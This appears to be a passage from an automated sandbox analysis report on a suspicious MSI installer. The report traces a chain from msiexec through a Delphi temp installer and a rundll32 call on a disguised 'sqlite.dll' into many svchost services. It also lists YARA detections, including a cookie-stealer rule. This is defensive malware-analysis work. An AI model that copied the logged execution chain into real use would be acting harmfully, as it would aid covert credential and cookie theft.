                                                                                  2021-10-24 10:50:10 UTC7INData Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
                                                                                  Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
                                                                                  2021-10-24 10:50:10 UTC7INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: msiexec.exe PID: 6980 Parent PID: 4448

                                                                                  General

                                                                                  Start time:12:49:02
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
                                                                                  Imagebase:0x7ff7a5c50000
                                                                                  File size:66048 bytes
                                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: msiexec.exe PID: 7056 Parent PID: 572

                                                                                  General

                                                                                  Start time:12:49:02
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7a5c50000
                                                                                  File size:66048 bytes
                                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: MSIFBC3.tmp PID: 4928 Parent PID: 7056

                                                                                  General

                                                                                  Start time:12:49:07
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Imagebase:0x400000
                                                                                  File size:7196212 bytes
                                                                                  MD5 hash:B6D7559D31D4FF2D02338DF9CEF2FBD8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: MSIFBC3.tmp PID: 6292 Parent PID: 4928

                                                                                  General

                                                                                  Start time:12:49:08
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
                                                                                  Imagebase:0x400000
                                                                                  File size:3014144 bytes
                                                                                  MD5 hash:D73DDB8F6B777CC6411FD3CA254F3DEC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: rundll32.exe PID: 5336 Parent PID: 6292

                                                                                  General

                                                                                  Start time:12:49:23
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
                                                                                  Imagebase:0xb00000
                                                                                  File size:61952 bytes
                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 2968 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:24
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 6944 Parent PID: 2968

                                                                                  General

                                                                                  Start time:12:49:25
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 6212 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:25
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 996 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:28
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 256 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:30
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 2320 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:31
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 2188 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:33
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 1512 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:35
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 1124 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:38
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 2468 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:40
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 664 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:42
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 2948 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:46
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 1452 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:48
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 1868 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:50
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 1340 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:52
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 3444 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:55
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 1188 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:58
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Analysis Process: svchost.exe PID: 5104 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:50:00
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth
